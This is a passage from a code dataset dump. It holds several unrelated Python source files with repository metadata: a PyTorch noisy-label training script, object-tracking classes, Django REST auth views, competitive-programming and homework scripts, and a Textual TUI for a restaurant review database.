idx0:\n targets_fast[n] = rand_lb_pair[1]\n # elif n in idx1:\n # targets_fast[n] = rand_lb_pair[0]\n # print('targets_fast:', targets_fast)\n fast_loss = criterion(outputs,targets_fast)\n grads = torch.autograd.grad(fast_loss, net.parameters(), create_graph=True, retain_graph=True, only_inputs=True)\n for grad in grads:\n grad = grad.detach()\n grad.requires_grad = False\n fast_weights = OrderedDict((name, param - args.fast_lr*grad) for ((name, param), 
grad) in zip(net.named_parameters(), grads))\n fast_out = net.forward(inputs,fast_weights)\n logp_fast = F.log_softmax(fast_out,dim=1)\n \n kl_div_vector = consistent_criterion(logp_fast,p_tch)\n kl_div_masked = torch.matmul(kl_div_vector, loss_mask)\n \n #### choose one from the following two lines (partial KL or full KL?)\n if args.partial_kl:\n kl_div_reduced = torch.mean(kl_div_masked, dim=0)\n else:\n kl_div_reduced = torch.mean(kl_div_vector)\n \n # rand_lb_pair_ordered = sorted(rand_lb_pair)\n # rand_lb_pair_tuple = (rand_lb_pair_ordered[0], rand_lb_pair_ordered[1])\n rand_lb_pair_tuple = (rand_lb_pair[0], rand_lb_pair[1])\n if epoch > args.kl_epoch:\n if rand_lb_pair_tuple in kl_dict.keys():\n kl_dict[rand_lb_pair_tuple].append(kl_div_reduced.data.item())\n else:\n kl_dict[rand_lb_pair_tuple] = [kl_div_reduced.data.item()]\n if i == 0:\n # ssl_loss = kl_div_reduced\n ssl_loss = torch.mean(kl_div_masked, dim=0)\n else:\n # ssl_loss = ssl_loss + kl_div_reduced\n ssl_loss = ssl_loss + torch.mean(kl_div_masked, dim=0)\n if args.num_ssl > 0:\n meta_loss2 = ssl_loss*ssl_lr/args.num_ssl\n meta_loss2.backward()\n \n optimizer.step() # Optimizer update\n \n # train_loss += class_loss.data[0]\n train_loss += class_loss.data.item()\n _, predicted = torch.max(outputs.data, 1)\n total += targets.size(0)\n correct += predicted.eq(targets.data).cpu().sum()\n \n # sys.stdout.write('\\r')\n # sys.stdout.write('| Epoch [%3d/%3d] Iter[%3d/%3d]\\t\\tLoss: %.4f Acc@1: %.3f%%'\n # # %(epoch, args.num_epochs, batch_idx+1, (len(train_loader.dataset)//args.batch_size)+1, class_loss.data[0], 100.*correct/total))\n # %(epoch, args.num_epochs, batch_idx+1, (len(train_loader.dataset)//args.batch_size)+1, class_loss.data.item(), 100.*correct/total))\n # sys.stdout.flush()\n if batch_idx%10==0:\n print('| Epoch [%3d/%3d] Iter[%3d/%3d]\\t\\tLoss: %.4f Acc@1: %.3f%%'\n %(epoch, args.num_epochs, batch_idx+1, (len(train_loader.dataset)//args.batch_size)+1, class_loss.data.item(), 100.*correct/total))\n if batch_idx%50==0:\n with torch.no_grad():\n val(epoch,batch_idx)\n val_tch(epoch,batch_idx)\n net.train()\n tch_net.train()\n \n \ndef val(epoch,iteration):\n global best\n net.eval()\n val_loss = 0\n correct = 0\n total = 0\n for batch_idx, (inputs, targets) in enumerate(val_loader):\n if use_cuda:\n inputs, targets = inputs.cuda(), targets.cuda()\n inputs, targets = Variable(inputs, volatile=True), Variable(targets)\n outputs = net(inputs)\n loss = criterion(outputs, targets)\n \n # val_loss += loss.data[0]\n val_loss += loss.data.item()\n _, predicted = torch.max(outputs.data, 1)\n total += targets.size(0)\n correct += predicted.eq(targets.data).cpu().sum()\n \n # Save checkpoint when best model\n acc = 100.*correct/total\n # print(\"\\n| Validation Epoch #%d Batch #%3d\\t\\t\\tLoss: %.4f Acc@1: %.2f%%\" %(epoch, iteration, loss.data[0], acc))\n print(\"\\n| Validation Epoch #%d Batch #%3d\\t\\t\\tLoss: %.4f Acc@1: %.2f%%\" %(epoch, iteration, loss.data.item(), acc))\n # record.write('Epoch #%d Batch #%3d Acc: %.2f' %(epoch,iteration,acc))\n # print('Epoch #%d Batch #%3d Acc: %.2f' %(epoch,iteration,acc))\n if acc > best:\n best = acc\n print('| Saving Best Model (net)...')\n save_checkpoint({\n 'state_dict': net.state_dict(),\n 'best_acc': best,\n }, save_point)\n\ndef val_tch(epoch,iteration):\n global best\n tch_net.eval()\n val_loss = 0\n correct = 0\n total = 0\n for batch_idx, (inputs, targets) in enumerate(val_loader):\n if use_cuda:\n inputs, targets = inputs.cuda(), targets.cuda()\n inputs, targets = 
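The OrderedDict of "fast weights" above is a one-step manual SGD update that stays on the autograd graph, so the consistency loss can backpropagate through it. A toy single-parameter version:

import torch
from collections import OrderedDict

w = torch.tensor([1.0], requires_grad=True)
params = OrderedDict([('w', w)])
loss = (params['w'] * 2.0 - 1.0) ** 2
grads = torch.autograd.grad(loss, [w], create_graph=True)
fast = OrderedDict((name, p - 0.1 * g) for (name, p), g in zip(params.items(), grads))
print(fast['w'])  # tensor([0.6000], grad_fn=<SubBackward0>): the update is differentiable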
Variable(inputs, volatile=True), Variable(targets)\n outputs = tch_net(inputs)\n loss = criterion(outputs, targets)\n \n # val_loss += loss.data[0]\n val_loss += loss.data.item()\n _, predicted = torch.max(outputs.data, 1)\n total += targets.size(0)\n correct += predicted.eq(targets.data).cpu().sum()\n \n # Save checkpoint when best model\n acc = 100.*correct/total\n # print(\"| tch Validation Epoch #%d Batch #%3d\\t\\t\\tLoss: %.4f Acc@1: %.2f%%\\n\" %(epoch, iteration, loss.data[0], acc))\n print(\"| tch Validation Epoch #%d Batch #%3d\\t\\t\\tLoss: %.4f Acc@1: %.2f%%\" %(epoch, iteration, loss.data.item(), acc))\n # record.write(' | tchAcc: %.2f\\n' %acc)\n # record.flush()\n # print(' | tchAcc: %.2f\\n' %acc)\n if acc > best:\n best = acc\n print('| Saving Best Model (tchnet)...')\n save_checkpoint({\n 'state_dict': tch_net.state_dict(),\n 'best_acc': best,\n }, save_point)\n\ndef test():\n test_net.eval()\n test_loss = 0\n correct = 0\n total = 0\n for batch_idx, (inputs, targets) in enumerate(test_loader):\n if use_cuda:\n inputs, targets = inputs.cuda(), targets.cuda()\n inputs, targets = Variable(inputs, volatile=True), Variable(targets)\n outputs = test_net(inputs)\n loss = criterion(outputs, targets)\n \n # test_loss += loss.data[0]\n test_loss += loss.data.item()\n _, predicted = torch.max(outputs.data, 1)\n total += targets.size(0)\n correct += predicted.eq(targets.data).cpu().sum()\n test_acc = 100.*correct/total \n print('* Test results : Acc@1 = %.2f%%' %(test_acc))\n # record.write('\\nTest Acc: %f\\n'%test_acc)\n # record.flush()\n # print('\\nTest Acc: %f\\n'%test_acc)\n \ndef float_to_filename(num):\n split_result = str(num).split('.')\n if split_result[0] == '0' and split_result[1] == '0':\n return '00'\n elif split_result[1] == '0':\n return split_result[0]\n else:\n return ''.join(split_result)\n\n# ===============================================\n# record=open('./checkpoint/'+args.id+'.txt','w')\n# record.write('learning rate: %f\\n'%args.lr)\n# record.write('batch size: %f\\n'%args.batch_size)\n# record.write('start iter: %d\\n'%args.start_iter)\n# record.write('mid iter: %d\\n'%args.mid_iter)\n# record.flush()\nprint('learning rate: %f\\n'%args.lr)\nprint('batch size: %d\\n'%args.batch_size)\nprint('number of additional mini-batches: %d\\n'%args.num_fast)\nprint('perturbation ratio: %f\\n'%args.perturb_ratio)\nprint('number of neighbor: %d\\n'%args.num_neighbor)\nprint('ramp-up end epoch of the meta-learning rate: %d\\n'%args.rampup_epoch)\nprint('LR decay epoch: %d\\n'%args.lrdecay_epoch)\n\nif os.path.exists('./checkpoint/%s.pth.tar'%args.mentor_ckpt):\n use_mentor = True\n if os.path.exists('./checkpoint/%s.pth.tar'%args.mentor_ckpt2):\n use_mentor2 = True\n keep_thre1 = float(re.search('2nd([0-9]+)', args.mentor_ckpt2).group(1))*0.1\n keep_thre2 = args.keep_threshold\n used_id = args.id + '_2nd%s_3rd%s' % (float_to_filename(keep_thre1), float_to_filename(keep_thre2))\n else:\n use_mentor2 = False\n keep_thre1 = args.keep_threshold\n used_id = args.id + '_2nd%s' % float_to_filename(keep_thre1)\nelse:\n use_mentor = False\n used_id = args.id\nif args.use_tm:\n used_id = used_id + '_tm'\nsave_point = './checkpoint/%s_%s%s_run%d_M%dS%dn%drho%s.pth.tar'%(used_id,\n args.noise_mode,\n float_to_filename(args.noise_ratio),\n args.run,\n args.num_fast,\n args.num_ssl,\n args.num_neighbor,\n float_to_filename(args.perturb_ratio))\nif args.use_wcl:\n save_point = save_point.replace('.pth.tar', '_w%s.pth.tar' % float_to_filename(args.init_weight))\nif not args.lr == 0.2:\n 
save_point = save_point.replace('.pth.tar', '_lr%s.pth.tar' % float_to_filename(args.lr))\nif not args.num_epochs == 180:\n save_point = save_point.replace('.pth.tar', '_ep%d.pth.tar' % args.num_epochs)\n\nbest = 0\ninit = True\n# Model\nprint('\\nModel setup')\nprint('| Building net')\nnet = models.PreActResNet32()\ntch_net = models.PreActResNet32()\npretrain_net = models.PreActResNet32()\ntest_net = models.PreActResNet32()\n\nprint('| load pretrain from ./checkpoint/%s.pth.tar'%args.pretrain_ckpt)\npretrain_ckpt = torch.load('./checkpoint/%s.pth.tar'%args.pretrain_ckpt)\npretrain_net.load_state_dict(pretrain_ckpt['state_dict'])\n\nif use_cuda:\n net.cuda()\n tch_net.cuda()\n pretrain_net.cuda()\n test_net.cuda()\n cudnn.benchmark = True\npretrain_net.eval()\n\nif use_mentor:\n loader = dataloader.cifar_dataloader(dataset=args.dataset,\n noise_ratio=args.noise_ratio,\n noise_mode=args.noise_mode,\n batch_size=args.batch_size,\n num_workers=0,\n root_dir=args.data_path,\n # log=stats_log,\n train_val_split_file='%s/train_val_split.json'%args.data_path,\n noise_file='%s/%s%s_run%d.json'%(args.data_path,\n args.noise_mode,\n ''.join(str(args.noise_ratio).split('.')),\n args.run),\n sample_filtering=True)\n filtering_loader = loader.run()\n mentor_net = models.PreActResNet32()\n print('| load mentor model from ./checkpoint/%s.pth.tar' % args.mentor_ckpt)\n mentor_ckpt = torch.load('./checkpoint/%s.pth.tar'%args.mentor_ckpt)\n mentor_net.load_state_dict(mentor_ckpt['state_dict'])\n mentor_net.cuda()\n mentor_net.eval()\n for param in mentor_net.parameters():\n param.requires_grad = False\n keep_idx1 = filtering(keep_thre1)\n print('remove %d samples' % (len(filtering_loader.dataset) - len(keep_idx1)))\n if use_mentor2:\n mentor_net = models.PreActResNet32()\n print('| load mentor model from ./checkpoint/%s.pth.tar' % args.mentor_ckpt2)\n mentor_ckpt = torch.load('./checkpoint/%s.pth.tar'%args.mentor_ckpt2)\n mentor_net.load_state_dict(mentor_ckpt['state_dict'])\n mentor_net.cuda()\n mentor_net.eval()\n for param in mentor_net.parameters():\n param.requires_grad = False\n keep_idx2 = filtering(keep_thre2)\n newly_removed_idx = [i for i in range(len(filtering_loader.dataset)) if ((i in keep_idx1) and (i not in keep_idx2))]\n print('remove %d additional samples' % len(newly_removed_idx))\n keep_idx = [i for i in keep_idx1 if i in keep_idx2]\n else:\n keep_idx = keep_idx1\nelse:\n print('| no mentor model')\n keep_idx = [] # [Note] empty list: keep all training samples\n\nloader = dataloader.cifar_dataloader(dataset=args.dataset,\n noise_ratio=args.noise_ratio,\n noise_mode=args.noise_mode,\n batch_size=args.batch_size,\n num_workers=0,\n root_dir=args.data_path,\n # log=stats_log,\n train_val_split_file='%s/train_val_split.json'%args.data_path,\n noise_file='%s/%s%s_run%d.json'%(args.data_path,\n args.noise_mode,\n ''.join(str(args.noise_ratio).split('.')),\n args.run),\n keep_idx=keep_idx)\ntrain_loader,val_loader,test_loader = loader.run()\nprint('After sample filtering, len(train_loader.dataset) = %d' % len(train_loader.dataset))\n\nfor param in tch_net.parameters():\n param.requires_grad = False\nfor param in pretrain_net.parameters():\n param.requires_grad = False\n\ncriterion = nn.CrossEntropyLoss()\nsoftmax_dim1 = nn.Softmax(dim=1)\nnll_loss = nn.NLLLoss()\nconsistent_criterion = nn.KLDivLoss(reduction='none')\noptimizer = optim.SGD(net.parameters(), lr=args.lr, momentum=0.9, weight_decay=1e-4)\n\nprint('\\nTraining model')\nprint('| Training Epochs = ' + str(args.num_epochs))\nprint('| Initial 
Learning Rate = ' + str(args.lr))\n\nnum_class = 10 # [TODO] remove magic number\ntop_k = 5 # [TODO] remove magic number\ntm = np.eye(num_class) # initialize the transition matrix using an identity matrix\nfor epoch in range(1, 1+args.num_epochs):\n # [TODO] remove magic number\n tm_keep_r = 0.99\n kl_dict = {}\n train(epoch, use_mentor)\n # if epoch%2==0:\n # print('\\nTesting model')\n # best_model = torch.load(save_point)\n # test_net.load_state_dict(best_model['state_dict'])\n # with torch.no_grad():\n # test()\n if use_tm and epoch > args.kl_epoch:\n tm_from_kl = np.zeros([num_class,num_class])\n for i in range(num_class):\n for j in range(num_class):\n if (i, j) in kl_dict.keys():\n tm_from_kl[i][j] = np.mean(kl_dict[(i,j)])\n tm_from_kl = np.power(tm_from_kl+1e-10, -float(args.sharpen))\n row_sums = tm_from_kl.sum(axis=1, keepdims=True)\n tm_from_kl = tm_from_kl / row_sums\n tm = tm_keep_r * tm + (1 - tm_keep_r) * tm_from_kl\n# kl_dict_sorted = sorted(kl_dict.items(), key=lambda x: np.mean(x[1]), reverse=True)\n# for i in kl_dict_sorted:\n# print(i[0], np.mean(i[1]))\n# print('kl_dict:')\n# for k, v in kl_dict.items():\n# print(k, v)\n\nif use_tm: \n np.save(save_point.replace('.pth.tar', '_tm.npy'), tm)\n # print(tm)\n print('tm:')\n for i in range(num_class):\n for j in range(num_class):\n print('%.4f' % tm[i][j], end=' ')\n print()\n\n# Run testing only once using the best model\nprint('\\nTesting model')\nbest_model = torch.load(save_point)\ntest_net.load_state_dict(best_model['state_dict'])\nwith torch.no_grad():\n test()\n\n\n# record.close()\n","repo_name":"ckghosted/SLSSL-for-NLL","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":27249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"72242116624","text":"import numpy as np\nfrom ..measurements import Measurements\nfrom . 
import Track\n\n\nclass Tracks(Measurements):\n def __init__(self):\n super().__init__()\n\n def __repr__(self):\n out = ''\n for track in self:\n out += f'{track.id}: {track}\\n'\n return out\n\n def numpy_to_tracks(self, track_list: np.ndarray, img_w, img_h):\n for track_candidate in track_list:\n x1, y1, x2, y2, track_id, detection_id, score, label_id = track_candidate\n track_candidate = Track(\n xyxy=(x1, y1, x2, y2), \n label_id=int(label_id),\n score=score, \n id=int(track_id), \n detection_id=int(detection_id)\n )\n if track_candidate.is_collision_between_bbox_and_img_border(img_w, img_h):\n continue\n self.append_measurement(track_candidate)\n return self\n\n def append_measurement(self, measurement) -> None:\n self.append(measurement)\n\n def get_world_positions(self):\n positions = []\n for track in self:\n positions.append(track.world_position)\n return positions\n","repo_name":"Sntz91/ipm_evaluation","sub_path":"fivesafe/image_tracking/tracks.py","file_name":"tracks.py","file_ext":"py","file_size_in_byte":1170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"11928765740","text":"from backend.apps.accounts.serializers import UserSerializer\nfrom backend.apps.accounts.models import User\nfrom backend.apps.api.api.serializers import SerializerByMethodViewSetMixin, EmptySerializer\nfrom backend.apps.accounts.serializers import RegisterSerializer\n\nfrom django.contrib.auth import get_user_model\nfrom rest_framework import viewsets, status\nfrom rest_framework.permissions import AllowAny, IsAuthenticated\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import action\n\n\nfrom drf_spectacular.utils import (\n extend_schema,\n)\n\nclass AuthViewSet(\n SerializerByMethodViewSetMixin,\n viewsets.GenericViewSet,\n):\n \"\"\"\n A viewset that provides the Auth standard actions\n \"\"\"\n\n permission_classes = [\n AllowAny,\n ]\n serializer_class = EmptySerializer\n serializer_classes = {\n \"register\": RegisterSerializer,\n }\n queryset = get_user_model().objects.none()\n\n @extend_schema(\n summary=\"Adds a new user\",\n description=\"Take a set of values and creates user account and returns user account details\",\n responses={201: RegisterSerializer},\n )\n @action(detail=False, methods=[\"POST\"])\n def register(self, request):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n user = serializer.save()\n return Response(\n self.get_serializer(user).data, status=status.HTTP_201_CREATED\n )\n\nclass UserViewSet(\n SerializerByMethodViewSetMixin,\n viewsets.ModelViewSet,\n):\n permission_classes = [IsAuthenticated]\n queryset = User.objects.all()\n serializer_class = UserSerializer\n serializer_classes = {\n \"me\": UserSerializer,\n }\n http_method_names = [\"get\", \"head\", \"put\", \"patch\", \"options\"]\n\n @action(detail=False, methods=[\"GET\"])\n def me(self, request):\n return Response(self.get_serializer(request.user).data)\n","repo_name":"Rashmichaturvedi94/ESS","sub_path":"backend/backend/apps/accounts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"14373768610","text":"# -*- coding: utf-8 -*-\nimport math\nimport heapq\nimport sys\nimport itertools\nfrom collections import deque\n\nsys.setrecursionlimit(1000000)\nMOD = 10 ** 9 + 7\nn, p = map(int, input().split())\n\n\ndef prime_f_multi(n, num):\n 
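# (assumed intent) multiply in i ** (k // n) for each prime factor i of num with exponent k, i.e. the largest x such that x**n divides num\n 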
ans = 1\n divisors = {}\n for i in range(2, num):\n k = 0\n while (num % i) == 0:\n k += 1\n num //= i\n if k != 0 and k // n > 0:\n ans *= i ** (k // n)\n if not divisors and num != 1:\n divisors[num] = 1\n return ans\n\n\nprint(prime_f_multi(n, p))\n","repo_name":"katataku/atcoder","sub_path":"VirtualContest/Piscine/A06/C.py","file_name":"C.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"16551719186","text":"def discount(quantity, price, discountrate):\n Total = quantity * price\n discountamount = discountrate * Total\n discountprice = Total - discountamount\n\n return discountamount, discountprice\n\n\n\n\n\n\n\nquantity = float(input(\"Enter the quantity: \"))\nprice = float(input(\"Enter the unit price: $ \"))\ndiscountrate = float(input(\"Enter the discount rate: % \"))\ndiscountamount,discountprice = discount(quantity, price, discountrate)\n\nprint(\"Quantity: \", quantity)\nprint(\"Unit Price: $ \", price)\nprint(\"Discounted Amount: $ \", discountamount)\nprint(\"Discounted Price: $ \", discountprice)","repo_name":"mannandesai1/CIS106W65","sub_path":"ps9p1.py","file_name":"ps9p1.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"5624110586","text":"import numpy as np\nimport torch\nimport torch.nn as nn\n\n\nclass PositionEmbedding(nn.Module):\n def __init__(self, max_len=11, emb_dim=32, n_vocab=27):\n super().__init__()\n pos = np.expand_dims(np.arange(max_len), 1) # [max_len, 1]\n pe = pos / np.power(1000, 2 * np.expand_dims(np.arange(emb_dim) // 2, 0) / emb_dim) # [max_len, emb_dim]\n pe[:, 0::2] = np.sin(pe[:, 0::2])\n pe[:, 1::2] = np.cos(pe[:, 1::2])\n pe = np.expand_dims(pe, 0) # [1, max_len, emb_dim]\n self.pe = torch.from_numpy(pe).type(torch.float32)\n self.embeddings = nn.Embedding(n_vocab, emb_dim)\n self.embeddings.weight.data.normal_(0, 0.1)\n\n def forward(self, x):\n device = self.embeddings.weight.device\n self.pe = self.pe.to(device)\n x_embed = self.embeddings(x.long())\n x_embed = x_embed + self.pe # [n, step, emb_dim]\n return x_embed # [n, step, emb_dim]\n\n\nif __name__ == '__main__':\n import data\n\n print(PositionEmbedding()(data.get_sample()[0]).shape)","repo_name":"lansinuote/NLP-Toturials","sub_path":"11.transfomer/position.py","file_name":"position.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"47"} +{"seq_id":"74439171663","text":"from __future__ import print_function\n\nfrom shallow import ShallowLearner\nfrom deep import DeepLearner\n\nimport pandas as pd\nimport numpy as np\nimport plots\nimport os\n\ndef main():\n \"\"\"Displays a CLI showing the execution process and results of the various classifiers.\"\"\"\n print(\"This is the 'Big Data' summative assignment for Z0954757.\")\n print()\n # Perform analysis for the Shallow Learning Initial Investigation\n shallow_initial = raw_input(\n \"Would you like to run the initial investigations for the shallow learning approaches (Estimated time to complete: 3 minutes)? 
(y/n)\"\n )\n if 'y' in shallow_initial.lower():\n # Create an instance of the ShallowLearner class\n shall = ShallowLearner()\n # Get the data for use in the shallow appraches\n shall.get_data(os.path.join('datasets','news_ds.csv'))\n # Try the first approach\n first_results = shall.first_approach()\n print(first_results)\n # Try the second approach\n second_results = shall.second_approach()\n print(second_results)\n # Try the third approach\n third_results = shall.third_approach()\n print(third_results)\n # Try the fourth approach\n fourth_results = shall.fourth_approach()\n print(fourth_results)\n\n\n # Perform analysis for the Shallow Learning Further Investigations\n shallow_further = raw_input(\n \"Would you like to run the further investigations for the shallow learning approaches? (y/n)\"\n )\n if 'y' in shallow_further.lower():\n load_data = raw_input(\n \"Type 'load' to load pre-existing data or nothing to regenerate the data (Estimated time to regenerate: 90 minutes)\"\n )\n if 'load' in load_data.lower():\n #Load data from csv files.\n plots.plot_grid_search(os.path.join('saves','ThirdApproachVariations.csv'), ' Third Approach - TF-IDF Grid Search Optimisation')\n plots.plot_grid_search(os.path.join('saves','FourthApproachVariations.csv'), ' Fourth Approach - N-gram (1,2) Grid Search Optimisation')\n else:\n print(\"Regenerating data.\")\n\n # Create an instance of the ShallowLearner class\n shall = ShallowLearner()\n # Get the data for use in the shallow appraches\n shall.get_data(os.path.join('datasets','news_ds.csv'))\n # Create arrays of test values for splits and max features.\n splits = np.arange(0.2, 1, 0.2)\n max_feats = np.arange(1000, 21000, 2000)\n\n print(\"Test splits: \", splits)\n print(\"Test maximum features: \", max_feats)\n\n # Intialise a dictionary to collect the results.\n third_results_dict = {\n 'splits' : [],\n 'no feats' : [],\n 'Accuracy': [],\n 'Precision' : [],\n 'Recall':[],\n 'F1':[]\n }\n\n print(\"Varying splits and max features for approach three.\")\n for test_split in splits:\n print(\"Testing at split: \", test_split)\n for features in max_feats:\n print(\"Testing at max features: \", features)\n results = shall.third_approach(split=test_split, no_features=features)\n third_results_dict['splits'].append(test_split)\n third_results_dict['no feats'].append(features)\n third_results_dict['Accuracy'].append(results['Accuracy'])\n third_results_dict['Precision'].append(results['Precision'])\n third_results_dict['Recall'].append(results['Recall'])\n third_results_dict['F1'].append(results['F1'])\n\n third_results_df = pd.DataFrame(third_results_dict)\n third_results_df.to_csv(os.path.join('saves','ThirdApproachVariationsRegen.csv'))\n\n # Vary n-gram format in approach four\n print(\"Varying n-gram range for approach four.\")\n n_gram_ranges = [(1,1),(2,2), (3,3), (1,2), (1,3)]\n fourth_n_gram_results_dict = {\n 'n_gram_range' : [],\n 'Accuracy': [],\n 'Precision' : [],\n 'Recall':[],\n 'F1':[]\n }\n\n for n_range in n_gram_ranges:\n print(\"Testing n gram range: \", n_range)\n results = shall.fourth_approach(n_range)\n fourth_n_gram_results_dict['n_gram_range'].append(n_range)\n fourth_n_gram_results_dict['Accuracy'].append(results['Accuracy'])\n fourth_n_gram_results_dict['Precision'].append(results['Precision'])\n fourth_n_gram_results_dict['Recall'].append(results['Recall'])\n fourth_n_gram_results_dict['F1'].append(results['F1'])\n\n fourth_n_gram_results_df = pd.DataFrame(fourth_n_gram_results_dict)\n 
fourth_n_gram_results_df.to_csv(os.path.join('saves','FourthApproachNGramsRegen.csv'))\n\n # Initialise a dictionary to collect the results.\n fourth_results_dict = {\n 'splits' : [],\n 'no feats' : [],\n 'Accuracy': [],\n 'Precision' : [],\n 'Recall':[],\n 'F1':[]\n }\n\n print(\"Varying splits and max features for approach four.\")\n for test_split in splits:\n print(\"Testing at split: \", test_split)\n for features in max_feats:\n print(\"Testing at max features: \", features)\n results = shall.fourth_approach(n_range=(1,2), split=test_split, no_features=features)\n fourth_results_dict['splits'].append(test_split)\n fourth_results_dict['no feats'].append(features)\n fourth_results_dict['Accuracy'].append(results['Accuracy'])\n fourth_results_dict['Precision'].append(results['Precision'])\n fourth_results_dict['Recall'].append(results['Recall'])\n fourth_results_dict['F1'].append(results['F1'])\n\n fourth_results_df = pd.DataFrame(fourth_results_dict)\n fourth_results_df.to_csv(os.path.join('saves','FourthApproachVariationsRegen.csv'))\n\n\n plots.plot_grid_search(os.path.join('saves','ThirdApproachVariationsRegen.csv'), ' Third Approach - TF-IDF Grid Search Optimisation')\n plots.plot_grid_search(os.path.join('saves','FourthApproachVariationsRegen.csv'), ' Fourth Approach - N-gram (1,2) Grid Search Optimisation')\n # Perform analysis for the Deep Learning Investigation\n deep_analysis = raw_input(\n \"Would you like to run the analysis for the deep learning approach? (y/n)\"\n )\n if 'y' in deep_analysis.lower():\n # Create an instance of the DeepLearner class\n deep = DeepLearner()\n # Get the data for the deep approach\n deep.get_data(os.path.join('datasets','news_ds.csv'))\n # Try the LSTM approach\n results = deep.lstm_approach()\n print(results)\n\n print(\"Closing CLI.\")\n\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"JRhodes95/big-data-cw","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"5588024171","text":"from textual.app import App, ComposeResult\nfrom textual.screen import Screen\nfrom textual.widgets import Header, Footer, Button, Static, Input, DataTable, ContentSwitcher\nfrom textual.containers import Container, Horizontal\nfrom db.models import Town, Restaurant, Review\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\n\n\n#Define needed widgets / overall functions\n# Main Page, All Data Page, Relation Page, Add Page\n# Main Page\n# Will ask for user login, greet, and display page options as well as quit option\n# Data Page\n# Will list available data categories and display data upon request, has back button\n# Relation Page\n# Will list available data categories and display data upon request, has back button\n# Add Page \n# Will list available data categories, provide form to add to each category, handle adding and updating database, refresh, display updated data, has back button\n\n\nclass Model:\n # towns = []\n # restaurants = []\n # reviews = []\n def __init__(self):\n engine = create_engine('sqlite:///db/thirddb.db')\n Session = sessionmaker(bind=engine)\n self.session = Session()\n self.towns = [town for town in self.session.query(Town)]\n self.restaurants = [rest for rest in self.session.query(Restaurant)]\n self.reviews = [rev for rev in self.session.query(Review)]\n\n\nclass LoginPage(Screen):\n \"\"\"Login Page\"\"\"\n\n def compose(self):\n yield Header(show_clock=True)\n 
yield Footer()\n yield Input(placeholder=\"Username\", id=\"username\")\n yield Button(\"Log In\", id=\"submit\", variant=\"success\")\n\n def on_button_pressed(self, event:Button.Pressed) -> None:\n inp = self.query_one('#username').value\n self.set_name(inp)\n self.app.push_screen(\"Menu\")\n \n def set_name(self, name):\n CLI.data[\"username\"] = name\n\n\nclass MainPage(Screen):\n \"\"\"Main Page\"\"\"\n\n BINDINGS=[('q', \"pop_screen()\", \"Log Out\"), ('z', \"ret()\", \"Raw Data\"), ('x', \"rel()\", \"Relative Data\"), ('c', \"add\", \"Add Data\")]\n\n\n def compose(self):\n name = self.get_name()\n yield Header(show_clock=True)\n yield Footer()\n with Container():\n yield Static(f\"Welcome, {name}\", id=\"welcome\", classes=\"title\")\n with Horizontal():\n yield Button(\"Retrieve Data Lists\", id=\"dataButton\")\n yield Button(\"View Relationship\", id=\"relationButton\")\n yield Button(\"Add Data\", id=\"addButton\")\n def get_name(self):\n name = CLI.data[\"username\"]\n if len(name) > 0:\n return name\n else: \n return \"Guest\"\n \n def on_button_pressed(self, event:Button.Pressed):\n if event.button.id == \"dataButton\":\n app.push_screen('Retrieve')\n elif event.button.id == \"relationButton\":\n app.push_screen(\"Relative\")\n elif event.button.id == \"addButton\":\n app.push_screen(\"Add\")\n\n def action_ret(self):\n app.push_screen('Retrieve')\n def action_rel(self):\n app.push_screen(\"Relative\")\n def action_add(self):\n app.push_screen(\"Add\")\n \n\n \n\nclass RetrievePage(Screen):\n\n BINDINGS=[('q', \"pop_screen()\", \"Go Back\"), ('t', 'get_towns()', 'Town Data'), ('r', 'get_rest()', 'Restaurant Data'), ('v', 'get_rev()', 'Review Data')]\n\n def compose(self):\n yield Header(show_clock=True)\n yield Footer()\n yield Static(\"Raw Data Page\", classes=\"title\")\n with Container(id=\"buttons\"):\n yield Button(\"Raw Towns\", id=\"town\")\n yield Button(\"Raw Restaurants\", id=\"rest\")\n yield Button(\"Raw Reviews\", id=\"rev\")\n yield Container(id=\"target\")\n yield Static(id=\"retrieved\")\n\n def on_button_pressed(self, event:Button.Pressed):\n if event.button.id == 'town':\n self.action_get_towns()\n elif event.button.id == 'rest':\n self.action_get_rest()\n elif event.button.id == 'rev':\n self.action_get_rev()\n\n def action_get_towns(self):\n self.query_one(\"#retrieved\").remove()\n towns = CLI.model.towns\n table = DataTable(id=\"retrieved\", name=\"Container\", zebra_stripes=True)\n table.add_columns(\"ID\", \"Town Name\", \"State\", f\"Length: {len(towns)}\")\n for town in towns:\n table.add_row(town.id, town.name, town.state)\n self.query_one(\"#target\").mount(table)\n\n def action_get_rest(self):\n self.query_one(\"#retrieved\").remove()\n rest = CLI.model.restaurants \n table = DataTable(id=\"retrieved\", name=\"Container\", zebra_stripes=True)\n table.add_columns(\"ID\", \"Name\", \"Address\", \"Phone\", f\"Length: {len(rest)}\")\n for r in rest:\n table.add_row(r.id, r.name, r.address, r.phone)\n self.query_one(\"#target\").mount(table)\n\n def action_get_rev(self):\n self.query_one(\"#retrieved\").remove()\n table = DataTable(id=\"retrieved\", name=\"Container\", zebra_stripes=True)\n rev = CLI.model.reviews\n table.add_columns(\"ID\", \"Review\", \"Star Rating\", f\"Length: {len(rev)}\")\n for r in rev:\n table.add_row(r.id, r.review_text, r.review_rating)\n self.query_one(\"#target\").mount(table)\n pass\n \nclass RelativePage(Screen):\n\n BINDINGS=[('q', \"pop_screen()\", \"Go Back\"), ('t', 'get_towns_rest()', 'See Restaurants in Towns'), ('r', 
